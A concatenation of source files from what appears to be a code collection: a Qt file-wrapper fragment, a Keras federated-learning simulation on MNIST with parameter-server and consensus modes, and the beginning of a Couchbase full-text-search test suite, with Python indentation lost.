WriteOnly = QIODevice.WriteOnly
ReadWrite = QIODevice.ReadWrite
def __init__(self, rutaFichero):
self.fichero = rutaFichero
super(File, self).__init__(rutaFichero)
#def open(self, mode):
# super(File, self).open(self.fichero, mode)
def read(self):
in_ = QTextStream(self)
return in_.readAll()
|
federated_learning_keras_low_power_PS_MNIST_crossentropy.py
|
from DataSets import MnistData
from DataSets_task import MnistData_task
from consensus.consensus_v3 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus , PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.2, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=20, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=500, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for lenet-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 200
condition = args.modelselection
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus, create the scheduling function ################
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration paramaters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
validation_train = 60000 # VALIDATION and training DATASET size
validation_test = 10000
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1 # consensus max delay 2= 2 epochs max
refresh_server = 1 # refresh server updates (in sec)
n_outputs = 10 # 6 classes
validation_start = 1 # start validation in epochs
# Using huber loss for stability
loss_function = keras.losses.Huber()
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
def get_noniid_data(total_training_size, devices, batch_size):
samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
devices) # create random numbers
samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# Ignore the following if you don't need integers
samples = np.round(samples) # transform them into integers
remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
step = 1 if remainings > 0 else -1
while remainings != 0:
i = np.random.randint(devices)
if samples[i] + step >= 0:
samples[i] += step
remainings -= step
return samples
####
def preprocess_observation(obs, batch_size):
img = obs# crop and downsize
img = (img).astype(np.float)
return img.reshape(batch_size, 28, 28, 1)
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(28, 28, 1,))
if condition == 0:
# lenet - 1
layer1 = layers.Conv2D(4, kernel_size=(5, 5), activation="relu")(inputs)
layer2 = layers.AveragePooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(8, kernel_size=(5, 5), activation="relu")(layer2)
layer4 = layers.AveragePooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
elif condition == 1:
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(inputs)
layer2 = layers.MaxPooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(layer2)
layer4 = layers.MaxPooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
else:
layer1 = layers.Conv2D(14, kernel_size=(3, 3), activation="relu")(inputs)
layer2 = layers.MaxPooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(layer2)
layer4 = layers.MaxPooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
classification = layers.Dense(n_outputs, activation="softmax")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
np.random.seed(1)
tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# create a data object (here radar data)
# start = time.time()
# data_handle = MnistData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
if args.noniid_assignment == 1:
data_handle = MnistData_task(device_index, start_samples, samples, full_data_size,
args.random_data_distribution)
else:
data_handle = MnistData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# end = time.time()
# time_count = (end - start)
# print(Training time"time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check scheduling for parameter server
if parameter_server:
while not os.path.isfile(global_epoch):
# implementing consensus
print("waiting")
pause(1)
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
pause(5)
print("retrying opening global epoch counter")
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
print("failed reading global epoch")
if epoch_global == 0:
training_signal = False
elif scheduling_tx[device_index, epoch_global] == 1:
if epoch_global > epoch_count:
epoch_count = epoch_global
training_signal = False
else:
training_signal = True
else:
# stop all computing, just save the previous model
training_signal = True
# always refresh the local model using the PS one
stop_aggregation = False
while not os.path.isfile(global_model):
# implementing consensus
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
model.set_weights(model_global.tolist())
if training_signal:
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check schedulting for parameter server
# Local learning update every "number of batches" batches
time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample, training=False)
# Calculate loss
loss = tf.reduce_mean(-tf.reduce_sum(masks * tf.math.log(classes), axis=1))
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
end = time.time()
time_count = time_count + (end-start)/number_of_batches
if not parameter_server and not federated:
print('Average batch training time {:.2f}'.format(time_count))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
while neighbor == device_index:
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Warm up")
train_start = False
# check if parameter server is enabled
# stop_aggregation = False
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample, training=False)
# Calculate loss
# loss = loss_function(label_sample, classes)
loss = tf.reduce_mean(-tf.reduce_sum(masks * tf.math.log(classes), axis=1)).numpy()
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
stable_topology_fts.py
|
# coding=utf-8
import copy
import json
import random
from threading import Thread
import Geohash
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputSingleton
from .fts_base import FTSBaseTest
from lib.membase.api.exception import FTSException, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
class StableTopFTS(FTSBaseTest):
def suite_setUp(self):
pass
def suite_tearDown(self):
pass
def setUp(self):
super(StableTopFTS, self).setUp()
def tearDown(self):
super(StableTopFTS, self).tearDown()
def check_fts_service_started(self):
try:
rest = RestConnection(self._cb_cluster.get_random_fts_node())
rest.get_fts_index_definition("invalid_index")
except ServerUnavailableException as e:
raise FTSException("FTS service has not started: %s" %e)
def create_simple_default_index(self):
plan_params = self.construct_plan_params()
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
self.create_fts_indexes_all_buckets(plan_params=plan_params)
if self._update or self._delete:
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
def test_index_docvalues_option(self):
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) != float(0):
self.fail("zap files size with docvalue not empty with docValues = False")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
index.update_docvalues_email_custom_index(True)
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) == float(0):
self.fail("zap files size with docvalue found to be empty with docValues = True")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
def test_maxttl_setting(self):
self.create_simple_default_index()
maxttl = int(self._input.param("maxttl", None))
self.sleep(maxttl,
"Waiting for expiration at the elapse of bucket maxttl")
self._cb_cluster.run_expiry_pager()
self.wait_for_indexing_complete(item_count=0)
self.validate_index_count(must_equal=0)
for index in self._cb_cluster.get_indexes():
query = eval(self._input.param("query", str(self.sample_query)))
hits, _, _, _ = index.execute_query(query,
zero_results_ok=True,
expected_hits=0)
self.log.info("Hits: %s" % hits)
def query_in_dgm(self):
self.create_simple_default_index()
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def run_default_index_query(self, query=None, expected_hits=None, expected_no_of_results=None):
self.create_simple_default_index()
zero_results_ok = True
if not expected_hits:
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
if not query:
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
if expected_no_of_results is None:
expected_no_of_results = self._input.param("expected_no_of_results", None)
for index in self._cb_cluster.get_indexes():
hits, matches, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
expected_no_of_results=expected_no_of_results)
self.log.info("Hits: %s" % hits)
#self.log.info("Matches: %s" % matches)
def test_query_type(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_type_on_alias(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
alias = self.create_alias([index])
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias)
def test_match_all(self):
self.run_default_index_query(query={"match_all": {}},
expected_hits=self._num_items)
def test_match_none(self):
self.run_default_index_query(query={"match_none": {}},
expected_hits=0)
def test_match_consistency(self):
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors
)
self.log.info("Hits: %s" % hits)
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
self.async_perform_update_delete(self.upd_del_fields)
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_error(self):
query = {"match_all": {}}
fts_node = self._cb_cluster.get_random_fts_node()
service_map = RestConnection(self._cb_cluster.get_master_node()).get_nodes_services()
# select FTS node to shutdown
for node_ip, services in list(service_map.items()):
ip = node_ip.split(':')[0]
node = self._cb_cluster.get_node(ip, node_ip.split(':')[1])
if node and 'fts' in services and 'kv' not in services:
fts_node = node
break
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
try:
from .fts_base import NodeHelper
NodeHelper.stop_couchbase(fts_node)
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
self.async_perform_update_delete(self.upd_del_fields)
finally:
NodeHelper.start_couchbase(fts_node)
NodeHelper.wait_service_started(fts_node)
self.sleep(10)
# "status":"remote consistency error" => expected_hits=-1
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=-1,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
ClusterOperationHelper.wait_for_ns_servers_or_assert([fts_node], self, wait_if_warmup=True)
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_long_timeout(self):
timeout = self._input.param("timeout", None)
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
tasks = []
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
tasks.append(Thread(target=self.async_perform_update_delete, args=(self.upd_del_fields,)))
for task in tasks:
task.start()
num_items = self._num_items
if timeout is None or timeout <= 60000:
# Here we assume that the update takes more than 60 seconds
# when we use timeout <= 60 sec we get timeout error
# with None we have 60s by default
num_items = 0
try:
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors,
timeout=timeout)
finally:
for task in tasks:
task.join()
self.log.info("Hits: %s" % hits)
def index_utf16_dataset(self):
self.load_utf16_data()
try:
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
# an exception will most likely be thrown from waiting
self.wait_for_indexing_complete()
self.validate_index_count(
equal_bucket_doc_count=False,
zero_rows_ok=True,
must_equal=0)
except Exception as e:
raise FTSException("Exception thrown in utf-16 test :{0}".format(e))
def create_simple_alias(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
alias = self.create_alias([index])
hits2, _, _, _ = alias.execute_query(self.sample_query,
zero_results_ok=False)
if hits != hits2:
self.fail("Index query yields {0} hits while alias on same index "
"yields only {1} hits".format(hits, hits2))
return index, alias
def create_query_alias_on_multiple_indexes(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
# create "emp" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="emp",
num_replicas=0)
